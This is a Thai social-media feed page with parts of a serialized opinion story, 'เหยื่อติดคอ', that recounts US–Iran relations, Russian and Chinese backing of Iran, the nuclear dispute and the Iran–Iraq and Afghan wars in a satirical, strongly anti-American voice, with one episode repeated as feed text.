คุณพี่ปูตินทำให้โลกอ้าปากค้าง มองตาไม่กระพริบ คุณพี่เดินทางไปอิหร่านอย่างเป็นทางการในฐานะหัวหน้ารัฐบาลของรัสเซีย หลังจากรัสเซียไม่ได้ไปเยี่ยมเยือนอิหร่านมา 60 ปี คุณพี่ประกาศในการไปเยี่ยมอิหร่านว่า รัสเซียจะปกป้องอิหร่านจากการคุกคามของอเมริกา เหมือนเป็นทางการเตือนผ่านไปในอากาศ ข้ามทวีปไปถึงคาวบอย Bush ว่า “โปรดระวัง” เตือนมา 7 ปีมาแล้ว การเตือนนี้จะยังมีผลอยู่หรือไม่ น่าติดตาม เสียงเตือนของคุณพี่ปูติน ถูกแปลงเป็นการเร่งเครื่อง คาวบอยอเมริกันเหมือนถูกหยามหน้า Pentagon รายงานว่า มีการหารือกันถึงการวางแผนจะให้ของขวัญอิหร่าน จะเอาแบบ “a broad bombing attack” ทิ้งระเบิดแบบปูพรมทั่วไปทั้งเตหะราน หรือเอาแบบ “surgical” ส่งให้เฉพาะกองทัพของอิหร่านดีนะ เรือรบจำนวนกว่าครึ่งของกองทัพเรืออเมริกา ถูกสั่งให้พร้อมเคลื่อนที่ประชิดอิหร่าน หน่วยงานความมั่นคงของอเมริกา National Security Strategy ออกข่าวในเดือนกันยายน ค.ศ. 2006 ว่า “เราอาจจะไม่เคยเจอประเทศใดเพียงประเทศเดียว ที่ท้าทายเราได้มากเท่าอิหร่าน !” เป็นคำพูดที่น่ากลัวมาก จากหน่วยงานความมั่นคง ของนักล่าใบตองแห้ง เจ้าหน้าที่อเมริกันบันทึกว่า การแข่งขันระหว่างอเมริกา รัสเซีย ได้เริ่มต้นใหม่อีกแล้ว การแข่งขันนี้ไม่ใช่แค่เรื่องนิวเคลียร์ของอิหร่าน แต่มันเป็นการแข่งขันชิงตำแหน่ง แชมป์โลก ทั้งทางด้านเศรษฐกิจ การเมือง และการทหารในตะวันออกกลาง และเลยไปกว่านั้น แต่นับจากวันนั้นถึงวันนี้ มันก็มีแต่การคว่ำบาตรกับการส่งเสียงใส่ใบตองแห้ง พี่เบิ้มอเมริกายังไม่ขยับเข้าไปใกล้เหยื่อชื่ออิหร่านมากกว่านั้น ยังปล่อยให้คาคออยู่อย่างนั้น จะเป็นพี่เบิ้มหมายเลขหนึ่งของโลก ต้องมีอุปกรณ์พร้อมอย่างน้อย 3 อย่าง อาวุธหนัก ทุนหนา และน้ำมันแน่น (ถัง) มันเป็นส่วนผสมที่เสริมสร้างกันเอง ดังนั้นอเมริกาต้อง “ได้” ตะวันออกกลาง ที่มีแหล่งน้ำมันกว่าครึ่งของโลก แต่จะได้ตะวันออกกลางอยู่ในมือเบ็ดเสร็จ ต้องจัดการเอาซาอุดิอารเบีย และอิหร่าน 2 ประเทศใหญ่ของตะวันออกกลาง มาอยู่ในกรงเลี้ยงให้เชื่อง ซาอุดิอารเบียติดอาหารยี่ห้อกระดาษสีเขียวตรานกอินทรีย์จนอิ่มแปร้ เกาะนิ่ง แม้บางครั้งจะออกอาการกระสับกระส่าย แต่ไม่ออกฤทธิ์ ตรงกันข้ามกับเหยื่อชื่ออิหร่าน อิหร่านดิ้นรน ออกแรง เพื่อให้หลุดจากกรงเหยื่อมานาน และอเมริกาก็ใช้สารพัดกับดัก ไม้เสี้ยม ไม้เสียบเพื่อให้เหยื่อเชื่องอยู่มือ อเมริกาคิดว่าเหยื่อทุกรายในตะวัน ออกกลาง (และดูเหมือนจะทั้งโลก !) จะชอบอาหารยี่ห้อเดียวกัน อาจจะใช่ แต่ไม่แน่ว่าจะเสมอไป และตลอดไป เมื่อหมดหนทางทำให้เหยื่อเชื่อง อเมริกาก็ตัดสินใจทำลายเหยื่ออย่างเหี้ยมโหด อิหร่านไม่หวังจะเป็นเหยื่อตลอดกาล แต่จะสู้โดยลำพัง ไม่แน่ว่าจะหลุดจากกรงได้ อิหร่านรู้จักสร้างแนวร่วม อิรัก เลบานอน และซีเรีย ซึ่งค่อยๆย้ายที่มายืนแถวเดียวกับอิหร่าน แต่ที่สำคัญ อิหร่านรู้จักแยกว่าใครคือเพื่อน และใครคือศัตรู สำหรับรัสเซียและจีน เพื่อไม่ให้อเมริกาครอบครองตะวันออกกลางทั้งหมด ซึ่งจะทำให้ทั้งรัสเซียและจีนเสียเปรียบ และอาจจะถึงเสียหาย จึงมีแต่จะต้องสนันสนุนอิหร่านให้เข้มแข็ง ให้เป็นไม้ขวางที่หนักและเคลื่อนย้ายยาก เหมือนท่อนซุงขวางทาง ไม่ให้อเมริกาก้าวครอบตะวันออก กลางทั้งหมดได้ง่ายๆ ยิ่งบวกอิรัก ซีเรีย และเลบานอน เข้าไปด้วย 4 ประเทศ รวมเป็นเสี้ยวพระจันทร์ อเมริกาเห็นแล้วก็คงหนาว ขบวนการเข้าไปในอิรัก ฉายหนังโหดซ้ำซากรอบหลังนี้ และการทำลายซีเรีย ซึ่งไม่น่าต้องถามว่าฝีมือใคร นับตั้งแต่คุณพี่ปูติน เดินเข้าไปจับมือกับอิหร่านเมื่อ 7 ปี ที่แล้ว สัมพันธ์ระหว่างรัสเซียกับอิหร่าน รวมทั้งจีน ดูเหมือนยิ่งกระชับและชิดแน่น การสนับสนุนร่วมมือระหว่าง 3 ประเทศ มีทั้งเปิดเผยและปิดลับ มันเป็นการเปิดทางให้เหยื่อก้าวย่างออกจากกรงอย่างเด็ดเดี่ยวและมั่นใจ อิหร่านถูกเหล่านักล่าตะวันตก ขูดเลือดเอาน้ำมันมากว่า 70 ปี จนถึงทุกวันนี้ก็ยังถูกขูดอยู่ ผ่านสงครามโลกมา 2 ครั้ง ก็ยังถูกหลอก ถูกย่ำยี จนศักดิ์ศรีของประเทศและประชาชนกร่อนแห้ง จากถูกอังกฤษขูดเลือด มาถูกอเมริกาเลาะเนื้อเถือกระดูกต่อ คนอิหร่านยอมลำบาก แต่ไม่ยอมก้มหัวเป็นเหยื่ออีกต่อไป เมื่อเหยื่อรายสำคัญ ตัดสินใจเลือกเดินออกจากกรง อเมริกาจะปล่อยมือ เปิดกรงให้ง่ายๆเช่นนั้นหรือ อเมริกาน่าจะคิดหนัก แต่ดูเหมือนเสียง “โปรดระวัง” ของคุณพี่ปูตินจะลอยลมมาผ่านข้ามไปอีกฟากหนึ่งของโลก..….ให้อเมริกาได้ยิน…..อีกรอบหนึ่ง สวัสดีครับ คนเล่านิทาน 25 กันยายน 2557
    0 Comments 0 Shares 99 Views 0 Reviews
  • เหยื่อติดคอ ตอนที่ 7
    นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ”
    ตอนที่ 7

    เดือนมกราคม ค.ศ.2002 คาวบอย Bush กล่าวหาอิหร่านว่ากำลังคิดการใหญ่สะสมอาวุธนิวเคลียร์ เลื่อนอันดับอิหร่านไปอยู่อันดับเดียวกับเด็กแสบเกาหลีเหนือ ถือเป็นการยกย่องอย่างรวดเร็ว อเมริกาบอกมันเป็นภัยต่อความมั่นคงของโลกเชียวล่ะ

    กุมภาพันธ์ ค.ศ.2003 อิหร่านยอมรับว่ากำลังสร้างโรง งานพัฒนาแร่ยูเรเนียม 2 โรง แต่เมื่อ Atomic Energy Agency (IAEA) บอกให้หยุด อิหร่านก็หยุด แต่อเมริกาไม่หยุด กล่าวหาต่อไปว่า อิหร่านกำลังสร้างอาวุธนิวเคลียร์แน่นอน อเมริกาไม่ยอม มันต้องมีสิ อเมริกาว่ามีก็ต้องมี อเมริกาไม่สนใจหรอกอิหร่านมีนิวเคลียร์กี่ลูก แต่มันเสียหน้า เข้าใจไหม

    พฤษภาคม ค.ศ.2003 อิหร่านยอมอ่อนข้อ ขอเจรจากับอเมริกา ขอให้อเมริกาเลิกการคว่ำบาตร ปลดชื่ออิหร่านจากป้ายผู้ก่อการร้าย เราดีกันนะอย่าโกรธกันต่อไปเลย เราอิหร่านก็จะยอมตามใจอเมริกา ในตะวันออกกลาง เราไม่ขวาง ไม่ขัดคออีกแล้วล่ะ อิหร่านยอมแพ้กระทั่งหยุดเดินหน้าการสร้างโรงงานไฟฟ้านิวเคลียร์ และให้อเมริกาตรวจสอบตามสบายว่าไม่มีนิวเคลียร์ซักลูกอยู่ในกระเป๋ากางเกง นอกจากนี้ก็จะไม่ยุ่ง ไม่ยุพวกฮามาสในอิสราเอลด้วย อะไรอีกล่ะ อ้อ เราจะเดินหน้าเป็นประชาธิปไตย เราจะให้ความร่วมมือ ฯลฯ สาระพัดอิหร่านจะยอม ข้ออ่อนจนยืนไม่ตรง คาวบอย Bush ไม่รับข้อเสนอ ปฏิเสธที่จะเจรจากับอิหร่าน นี่มันนึกว่ากำลังเล่นขี่วัวมาราธอนอยู่หรือไงนะ

    รัฐบาล Bush คิดว่าตัวเองกำลังถือไพ่เหนือมืออิหร่าน สายเหยี่ยวคิดว่าการสั่งสอนอิรัก จะทำให้อิหร่านดีฝ่อ อเมริกาคิดว่าการหนุนและชุบเลี้ยงพวกชีอ่ะในอิรัก (ซึ่งมีจำนวนถึง 60% ของชาวอิรัก) โดยเฉพาะพวกที่อยู่ที่ Najaf และ Karbala จะทำให้พวกชีอ่ะเหล่านี้ไม่เข้าพวกกับอิหร่าน เพราะติดใจอาหารที่อเมริกาใช้เลี้ยง

    อเมริการู้สึกจะประเมินผิดพลาดอย่างไม่น่าเชื่อ การบุกขยี้อิรัก ทำให้ชาวตะวันออกกลางยิ่งรังเกียจอเมริกา และเริ่มรวมตัวกันทั้งนิกายชีอ่ะและสุนหนี่ ทำให้กลุ่มอิสลามเคร่งครัดยิ่งเข้มแข็งขึ้นและใหญ่ขึ้น

    แม้อิหร่านจะไม่แสดงอาการท้าทายอเมริกาอย่างตรงๆ แต่อิหร่านมีนโยบายสนับสนุนทั้งอาวุธและทุนให้กับกลุ่มชีอ่ะในอิรัก รวมทั้งสนับสนุนรัฐบาลผสม Maliki ซึ่งเป็นตัวเลือกของอเมริกาในอิรัก ในปี ค.ศ.2005 มีการเลือกตั้งในอิรัก ซึ่งอำนวยการสร้างโดยอเมริกา CIA รายงานว่า อิหร่านส่งเงินสนับสนุนพวกชีอ่ะจำนวน 11 ล้านเหรียญต่อสัปดาห์ เพื่อสร้างฐานเสียงให้แก่ชีอ่ะ ซึ่งในที่สุดก็ได้คะแนนเสียงข้างมากในการเลือกตั้ง ถึงอิหร่านจะไม่ได้ประกาศท้าทายอเมริกาโดยตรง แต่ดูเหมือนการกระทำของอิหร่านจะชัดขึ้นเรื่อยๆ
    แต่เหตุการณ์ที่ทำให้ตำแหน่งการยืนของอิหร่าน หรืออาการเป็นเหยื่อของอิหร่าน เปลี่ยนไปอย่างชัดเจน น่าสนใจในสายตาโลก และน่ากลุ้มใจในสายตาของอเมริกาอย่างยิ่งคือ เมื่อ Mahmoud Ahmadinejad ได้รับเลือกตั้งเป็นประธานาธิบดีคนใหม่ของอิหร่าน ในเดือนมิถุนายน ค.ศ.2005

    หลังจากถูกกล่าวหาว่ามีนิวเคลียร์อยู่ในกระเป๋ากางเกงหลายลูก อิหร่านวิ่งพล่านพยายามหาเพื่อนช่วย อิหร่านขอให้อังกฤษ ฝรั่งเศสและเยอรมัน ช่วยเจรจากับอเมริกาอยู่หลายปี แต่คำตอบคือความเงียบจากบรรดาผู้ที่คิดว่าเป็นเพื่อนหรือเคยเป็นเพื่อนของอิหร่าน

    Ahmadinejad มีความเห็นว่า เราจะวิ่งพล่านง้อชาวบ้านเขาตลอดเวลา คงไม่ไหว อิหร่านควรพึ่งตัวเอง ยืนบนขาตัวเองเสียที เลิกได้แล้วที่จะไปคอยของ้อ ขอเจรจา ความอยู่รอดของพวกเรา ขึ้นอยู่กับความเข้มแข็งของเราเอง และคบเพื่อนให้ถูกคน สมันน้อยน่าจะได้ข้อคิดจากเหยื่อรายนี้บ้าง

    เดือนสิงหาคม ค.ศ.2005 หลังจากรับตำแหน่ง Ahmadinejad ก็ประกาศว่า เราจะเดินหน้าพัฒนาแร่ยูเรเนียมต่อไป และในเดือนมกราคม ค.ศ.2006 การค้นคว้าด้านนิวเคลียร์ที่ Nataz ของอิหร่านก็กลับมาเดินหน้าต่อ

    ในเดือนเมษายน อิหร่านประกาศว่า การพัฒนาแร่ยูเรเนียมของอิหร่านประสบผลสำเร็จอย่างดี IAEA รีบวิ่งไปรายงานสหประชาชาติ

    ภายใต้ Nuclear Non-Proliferation Treaty อิหร่านมีสิทธิจะเสริมสมรรถนะยูเรเนียม เพื่อเป็นพลังงานได้ แต่เทคนิคที่ใช้ในการพัฒนา ก็เป็นประเด็นว่าสามารถพัฒนาเป็นอาวุธนิวเคลียร์ได้หรือไม่

    อเมริกาเต้น พวกเรายอมไม่ได้ เอาเรื่องเข้าสหประชาชาติด่วน และทำการชักใยสหประชาชาติ ให้สั่งอิหร่านหยุดดำเนินการโครงการพัฒนานิวเคลียร์ พร้อมขู่จะใช้กำลัง และเพิ่มการคว่ำบาตรอีกหลายใบ ถ้าอิหร่านไม่เชื่อฟัง

    แต่แล้วก็มีพระเอกสองคนจูงมือกันมาขวางทาง มาแล้วคุณพี่ปูตินกับอาเฮียกระเป๋าใหญ่ ทั้งสองบอกว่า มติเช่นนี้ของสหประชาชาติ มันไม่ได้สร้างสันติหรอกนะ แต่มันเป็นข้ออ้างให้อเมริกาสร้างสงครามมากกว่า

    เดือนพฤษภาคม ค.ศ.2006 อเมริกาเปลี่ยนบท ยอมให้ตัดข้อความในมติของสหประชาชาติ ส่วนที่บอกว่าจะใช้กำลังกับอิหร่านออกไป และพร้อมที่จะเจรจากับอิหร่านเป็นครั้งแรกในรอบ 25 ปี ถ้าอิหร่านรับรองว่าจะหยุดโครงการพัฒนาแร่ยูเรเนียม อะไรทำให้อเมริกาเปลี่ยนบทแบบหักมุม จนมุมหัก มันเป็นแผนต้มอิหร่านซ้ำซากหรืออะไรกันแน่
    วันที่ 18 สิงหาคม ค.ศ.2006 คณะทำงานของกรรมธิการด้านข่าวกรอง ทำหนังสือแจ้งประธานกรรมาธิการ ด้านข่าวกรองประจำสหรัฐอเมริกา ยาวเกือบ 30 หน้า สรุปสั้นๆเอาแต่เนื้อไม่ติดมันว่า อิหร่านกำลังกระทำการ ที่เป็นการท้าทายความมั่นคงของอเมริกาอย่างสูง (ว๊าว ! ) ไม่ว่าจะเรื่องการซุ่มสร้างระเบิดนิวเคลียร์ การแอบทำอาวุธชีวภาพ การสร้างระบบป้องกัน และยิงจรวดวิถีไกล ซึ่งถ้านำระเบิดนิวเคลียร์มาใช้ร่วมกับระบบนี้ หลายบริเวณของโลกต้องร้อนระอุ นี่ยังไม่นับการส่งเสียเลี้ยงกลุ่มเด็กที่ชอบเล่นอาวุธ ที่อิหร่านเลี้ยงดูอยู่หลายกลุ่ม เพื่อเอาไว้แหย่รังแตนในตะวันออกกลาง โดยเฉพาะแตนแถวอิสราเอล และการเข้าไปกระชับมิตร กอดคอกับกลุ่มเพื่อน สร้างแนวร่วมพระจันทร์เสี้ยว เช่น อิรัก ซีเรีย และเลบานอน พฤติกรรมเช่นนี้ อเมริกาบอกยังไม่รู้จะวางแผนรับมืออย่างไร (อ้าว ! ) เพราะอเมริกาขาดข้อมูล งานด้านข่าวกรองในอิหร่านทำงานไม่ได้ผล

    ที่สำคัญไม่สามารถแน่ใจได้ว่า อิหร่านมีนิวเคลียร์กี่ลูก และระยะยิงไกลขนาดไหน อเมริกาคาดว่า จากการตรวจสอบปริมาณแร่ยูเรเนียมและพลูโตเนียมที่ IAEA ค้นพบ (ยังไม่นับที่ฝังดินซ่อนไว้และยังไม่พบ !) น่าจะทำให้อิหร่านสร้างนิวเคลียร์ได้ไม่น้อยกว่า 12 ลูก (แหม! 2 ลูกก็เกินพอแล้ว) นอกจากนี้ Dr. A.Q. Khan มือพระกาฬในการสร้างระเบิดนิวเคลียร์ของปากีสถาน สารภาพ (หลังจากถูกเค้นจนต้องคาย) ว่า เขาได้ขายสูตรพิเศษ ในการทำระเบิดนิวเคลียร์ไห้แก่อิหร่าน ลิเบีย และเกาหลีเหนือ ไปเรียบร้อยนานแล้ว

    สวัสดีครับ
    คนเล่านิทาน
    25 กันยายน 2557
    เหยื่อติดคอ ตอนที่ 7 นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ” ตอนที่ 7 เดือนมกราคม ค.ศ.2002 คาวบอย Bush กล่าวหาอิหร่านว่ากำลังคิดการใหญ่สะสมอาวุธนิวเคลียร์ เลื่อนอันดับอิหร่านไปอยู่อันดับเดียวกับเด็กแสบเกาหลีเหนือ ถือเป็นการยกย่องอย่างรวดเร็ว อเมริกาบอกมันเป็นภัยต่อความมั่นคงของโลกเชียวล่ะ กุมภาพันธ์ ค.ศ.2003 อิหร่านยอมรับว่ากำลังสร้างโรง งานพัฒนาแร่ยูเรเนียม 2 โรง แต่เมื่อ Atomic Energy Agency (IAEA) บอกให้หยุด อิหร่านก็หยุด แต่อเมริกาไม่หยุด กล่าวหาต่อไปว่า อิหร่านกำลังสร้างอาวุธนิวเคลียร์แน่นอน อเมริกาไม่ยอม มันต้องมีสิ อเมริกาว่ามีก็ต้องมี อเมริกาไม่สนใจหรอกอิหร่านมีนิวเคลียร์กี่ลูก แต่มันเสียหน้า เข้าใจไหม พฤษภาคม ค.ศ.2003 อิหร่านยอมอ่อนข้อ ขอเจรจากับอเมริกา ขอให้อเมริกาเลิกการคว่ำบาตร ปลดชื่ออิหร่านจากป้ายผู้ก่อการร้าย เราดีกันนะอย่าโกรธกันต่อไปเลย เราอิหร่านก็จะยอมตามใจอเมริกา ในตะวันออกกลาง เราไม่ขวาง ไม่ขัดคออีกแล้วล่ะ อิหร่านยอมแพ้กระทั่งหยุดเดินหน้าการสร้างโรงงานไฟฟ้านิวเคลียร์ และให้อเมริกาตรวจสอบตามสบายว่าไม่มีนิวเคลียร์ซักลูกอยู่ในกระเป๋ากางเกง นอกจากนี้ก็จะไม่ยุ่ง ไม่ยุพวกฮามาสในอิสราเอลด้วย อะไรอีกล่ะ อ้อ เราจะเดินหน้าเป็นประชาธิปไตย เราจะให้ความร่วมมือ ฯลฯ สาระพัดอิหร่านจะยอม ข้ออ่อนจนยืนไม่ตรง คาวบอย Bush ไม่รับข้อเสนอ ปฏิเสธที่จะเจรจากับอิหร่าน นี่มันนึกว่ากำลังเล่นขี่วัวมาราธอนอยู่หรือไงนะ รัฐบาล Bush คิดว่าตัวเองกำลังถือไพ่เหนือมืออิหร่าน สายเหยี่ยวคิดว่าการสั่งสอนอิรัก จะทำให้อิหร่านดีฝ่อ อเมริกาคิดว่าการหนุนและชุบเลี้ยงพวกชีอ่ะในอิรัก (ซึ่งมีจำนวนถึง 60% ของชาวอิรัก) โดยเฉพาะพวกที่อยู่ที่ Najaf และ Karbala จะทำให้พวกชีอ่ะเหล่านี้ไม่เข้าพวกกับอิหร่าน เพราะติดใจอาหารที่อเมริกาใช้เลี้ยง อเมริการู้สึกจะประเมินผิดพลาดอย่างไม่น่าเชื่อ การบุกขยี้อิรัก ทำให้ชาวตะวันออกกลางยิ่งรังเกียจอเมริกา และเริ่มรวมตัวกันทั้งนิกายชีอ่ะและสุนหนี่ ทำให้กลุ่มอิสลามเคร่งครัดยิ่งเข้มแข็งขึ้นและใหญ่ขึ้น แม้อิหร่านจะไม่แสดงอาการท้าทายอเมริกาอย่างตรงๆ แต่อิหร่านมีนโยบายสนับสนุนทั้งอาวุธและทุนให้กับกลุ่มชีอ่ะในอิรัก รวมทั้งสนับสนุนรัฐบาลผสม Maliki ซึ่งเป็นตัวเลือกของอเมริกาในอิรัก ในปี ค.ศ.2005 มีการเลือกตั้งในอิรัก ซึ่งอำนวยการสร้างโดยอเมริกา CIA รายงานว่า อิหร่านส่งเงินสนับสนุนพวกชีอ่ะจำนวน 11 ล้านเหรียญต่อสัปดาห์ เพื่อสร้างฐานเสียงให้แก่ชีอ่ะ ซึ่งในที่สุดก็ได้คะแนนเสียงข้างมากในการเลือกตั้ง ถึงอิหร่านจะไม่ได้ประกาศท้าทายอเมริกาโดยตรง แต่ดูเหมือนการกระทำของอิหร่านจะชัดขึ้นเรื่อยๆ แต่เหตุการณ์ที่ทำให้ตำแหน่งการยืนของอิหร่าน หรืออาการเป็นเหยื่อของอิหร่าน เปลี่ยนไปอย่างชัดเจน น่าสนใจในสายตาโลก และน่ากลุ้มใจในสายตาของอเมริกาอย่างยิ่งคือ เมื่อ Mahmoud Ahmadinejad ได้รับเลือกตั้งเป็นประธานาธิบดีคนใหม่ของอิหร่าน ในเดือนมิถุนายน ค.ศ.2005 หลังจากถูกกล่าวหาว่ามีนิวเคลียร์อยู่ในกระเป๋ากางเกงหลายลูก อิหร่านวิ่งพล่านพยายามหาเพื่อนช่วย อิหร่านขอให้อังกฤษ ฝรั่งเศสและเยอรมัน ช่วยเจรจากับอเมริกาอยู่หลายปี แต่คำตอบคือความเงียบจากบรรดาผู้ที่คิดว่าเป็นเพื่อนหรือเคยเป็นเพื่อนของอิหร่าน Ahmadinejad มีความเห็นว่า เราจะวิ่งพล่านง้อชาวบ้านเขาตลอดเวลา คงไม่ไหว อิหร่านควรพึ่งตัวเอง ยืนบนขาตัวเองเสียที เลิกได้แล้วที่จะไปคอยของ้อ ขอเจรจา ความอยู่รอดของพวกเรา ขึ้นอยู่กับความเข้มแข็งของเราเอง และคบเพื่อนให้ถูกคน สมันน้อยน่าจะได้ข้อคิดจากเหยื่อรายนี้บ้าง เดือนสิงหาคม ค.ศ.2005 หลังจากรับตำแหน่ง Ahmadinejad ก็ประกาศว่า เราจะเดินหน้าพัฒนาแร่ยูเรเนียมต่อไป และในเดือนมกราคม ค.ศ.2006 การค้นคว้าด้านนิวเคลียร์ที่ Nataz ของอิหร่านก็กลับมาเดินหน้าต่อ ในเดือนเมษายน อิหร่านประกาศว่า การพัฒนาแร่ยูเรเนียมของอิหร่านประสบผลสำเร็จอย่างดี IAEA รีบวิ่งไปรายงานสหประชาชาติ ภายใต้ Nuclear Non-Proliferation Treaty อิหร่านมีสิทธิจะเสริมสมรรถนะยูเรเนียม เพื่อเป็นพลังงานได้ แต่เทคนิคที่ใช้ในการพัฒนา ก็เป็นประเด็นว่าสามารถพัฒนาเป็นอาวุธนิวเคลียร์ได้หรือไม่ อเมริกาเต้น พวกเรายอมไม่ได้ เอาเรื่องเข้าสหประชาชาติด่วน และทำการชักใยสหประชาชาติ ให้สั่งอิหร่านหยุดดำเนินการโครงการพัฒนานิวเคลียร์ พร้อมขู่จะใช้กำลัง และเพิ่มการคว่ำบาตรอีกหลายใบ ถ้าอิหร่านไม่เชื่อฟัง แต่แล้วก็มีพระเอกสองคนจูงมือกันมาขวางทาง มาแล้วคุณพี่ปูตินกับอาเฮียกระเป๋าใหญ่ ทั้งสองบอกว่า มติเช่นนี้ของสหประชาชาติ มันไม่ได้สร้างสันติหรอกนะ แต่มันเป็นข้ออ้างให้อเมริกาสร้างสงครามมากกว่า เดือนพฤษภาคม ค.ศ.2006 อเมริกาเปลี่ยนบท ยอมให้ตัดข้อความในมติของสหประชาชาติ ส่วนที่บอกว่าจะใช้กำลังกับอิหร่านออกไป และพร้อมที่จะเจรจากับอิหร่านเป็นครั้งแรกในรอบ 25 ปี ถ้าอิหร่านรับรองว่าจะหยุดโครงการพัฒนาแร่ยูเรเนียม อะไรทำให้อเมริกาเปลี่ยนบทแบบหักมุม จนมุมหัก มันเป็นแผนต้มอิหร่านซ้ำซากหรืออะไรกันแน่ วันที่ 18 สิงหาคม ค.ศ.2006 คณะทำงานของกรรมธิการด้านข่าวกรอง ทำหนังสือแจ้งประธานกรรมาธิการ ด้านข่าวกรองประจำสหรัฐอเมริกา ยาวเกือบ 30 หน้า สรุปสั้นๆเอาแต่เนื้อไม่ติดมันว่า อิหร่านกำลังกระทำการ ที่เป็นการท้าทายความมั่นคงของอเมริกาอย่างสูง (ว๊าว ! ) ไม่ว่าจะเรื่องการซุ่มสร้างระเบิดนิวเคลียร์ การแอบทำอาวุธชีวภาพ การสร้างระบบป้องกัน และยิงจรวดวิถีไกล ซึ่งถ้านำระเบิดนิวเคลียร์มาใช้ร่วมกับระบบนี้ หลายบริเวณของโลกต้องร้อนระอุ นี่ยังไม่นับการส่งเสียเลี้ยงกลุ่มเด็กที่ชอบเล่นอาวุธ ที่อิหร่านเลี้ยงดูอยู่หลายกลุ่ม เพื่อเอาไว้แหย่รังแตนในตะวันออกกลาง โดยเฉพาะแตนแถวอิสราเอล และการเข้าไปกระชับมิตร กอดคอกับกลุ่มเพื่อน สร้างแนวร่วมพระจันทร์เสี้ยว เช่น อิรัก ซีเรีย และเลบานอน พฤติกรรมเช่นนี้ อเมริกาบอกยังไม่รู้จะวางแผนรับมืออย่างไร (อ้าว ! ) เพราะอเมริกาขาดข้อมูล งานด้านข่าวกรองในอิหร่านทำงานไม่ได้ผล ที่สำคัญไม่สามารถแน่ใจได้ว่า อิหร่านมีนิวเคลียร์กี่ลูก และระยะยิงไกลขนาดไหน อเมริกาคาดว่า จากการตรวจสอบปริมาณแร่ยูเรเนียมและพลูโตเนียมที่ IAEA ค้นพบ (ยังไม่นับที่ฝังดินซ่อนไว้และยังไม่พบ !) น่าจะทำให้อิหร่านสร้างนิวเคลียร์ได้ไม่น้อยกว่า 12 ลูก (แหม! 2 ลูกก็เกินพอแล้ว) นอกจากนี้ Dr. A.Q. Khan มือพระกาฬในการสร้างระเบิดนิวเคลียร์ของปากีสถาน สารภาพ (หลังจากถูกเค้นจนต้องคาย) ว่า เขาได้ขายสูตรพิเศษ ในการทำระเบิดนิวเคลียร์ไห้แก่อิหร่าน ลิเบีย และเกาหลีเหนือ ไปเรียบร้อยนานแล้ว สวัสดีครับ คนเล่านิทาน 25 กันยายน 2557
    0 Comments 0 Shares 92 Views 0 Reviews
  • เหยื่อติดคอ ตอนที่ 6
    นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ”
    ตอนที่ 6

    สงครามอิรักอิหร่าน ที่ถูกชักใยโดยอเมริกา ทำให้ชาวอิหร่านตายไปไม่น้อยกว่า 300,000 คน และชีวิตชาวอิรักอีกประมาณ 100,000 คน มีคนเจ็บประเทศละไม่น้อยกว่า 700,000 คน ส่วนการรบในอาฟกานิสถาน ระหว่าง ค.ศ.1979-1989 ชีวิตของคนอาฟกันต้องเสียไปประมาณ 1 ล้านคน (รวมทั้งทหารของสหภาพโซเวียตอีก 15,000 นาย) 1 ใน 3 ของชาวอาฟกันกลายเป็นผู้ลี้ภัยอาศัยอยู่ตามเต้นท์ และมันกลายเป็นการเริ่มต้นใหม่ของการต่อต้านการล่าอาณานิคม คราวนี้ไม่ใช่นักล่าจากเกาะใหญ่เท่าปลายนิ้วก้อยของเท้าซ้าย แต่เป็นอเมริกา นักล่าหน้าใหม่ ใจเหี้ยมโหด จากแผ่นดินใหญ่ที่แย่งชิงมาจากอินเดียนแดง เป็นวีรกรรมที่ต้องบันทึกไว้

    เมื่อสหภาพโซเวียตล้มครืนในปี ค.ศ.1991 อเมริกากระหยิ่ม คิดว่าเส้นทางก้าวสู่การเป็นหมายเลขหนึ่งของโลกสะดวกโล่ง เมื่อคู่แข่งคนสำคัญถูกเขี่ยตกไปจากลู่แข่ง มันอาจจะเป็นการตกจากลู่แข่งเป็นการชั่วคราวเท่านั้น แต่ตอนนั้นอเมริกาไม่ได้คิดอย่างนั้น ความเกลียด ความสะใจคงจะทำให้มองภาพไม่ชัด อเมริกาคิดว่านี่เป็นโอกาสเหมาะ ที่จะสยายปีกมาทางตะวันออกกลาง และยิ่งเมื่อ Khomeini ได้ถึงแก่กรรมไปแล้ว อิหร่านคงไม่แกร่งอย่างเดิม อเมริกาไม่จำเป็นต้อง “เลี้ยง” อิหร่านอีกต่อไป ยักษ์ล้มไปแล้ว ยันต์กันยักษ์ไม่มีความหมายเหมือนเก่า

    แต่ดูเหมือนอเมริกาจะอ่านไม่ขาด สงครามอิรัก อิหร่าน กลับทำให้การปกครองของ Khomeini เข้มแข็งขึ้น ชาวตะวันออกเห็นความอึดและเด็ดขาดของ Khomeini ชัดเจน มีการรวมตัวกันมากขึ้น เพราะเห็นเป้าหมายชัดเจน ยิ่งเมื่อสหภาพโซเวียตที่ถูกมองว่าเป็นคู่แข่งคนเดียว ที่พอจะต่อกรกับอเมริกาได้ถูกน๊อคนับ 10 กลุ่มอิสลามกลับคิดรวมตัวกัน เพื่อป้องกันการครอบครองของอเมริกา และเริ่มเข้าไปมีส่วนในการเมืองในภูมิภาคของตนเอง

    นอกจากนั้น การที่อเมริกาอุดหนุนให้อาวุธ และทำการฝึกให้กลุ่มอาฟกันและ Mujahadeen เพื่อให้ไปโซ้ยกับรัสเซียแทนตนนั้น ทำให้กลุ่มอิสลามติดอาวุธพวกนี้ยิ่งฮึกเหิม พวกเขาเชื่อว่า เมื่อล้มยักษ์ได้ตัวหนึ่ง (สหภาพโซเวียต) ทำไมจะล้มยักษ์ตัวอื่นๆอีกไม่ได้ และเมื่อเริ่ม ค.ศ.1990 เป็นต้นมา กลุ่มอิสลามหัวรุนแรงก็ดูเหมือนจะขยายใหญ่ขึ้นเรื่อยๆ และกลายเป็นเหยื่อที่มีก้าง ติดเสียบค้างอยู่กลางคอของอเมริกา

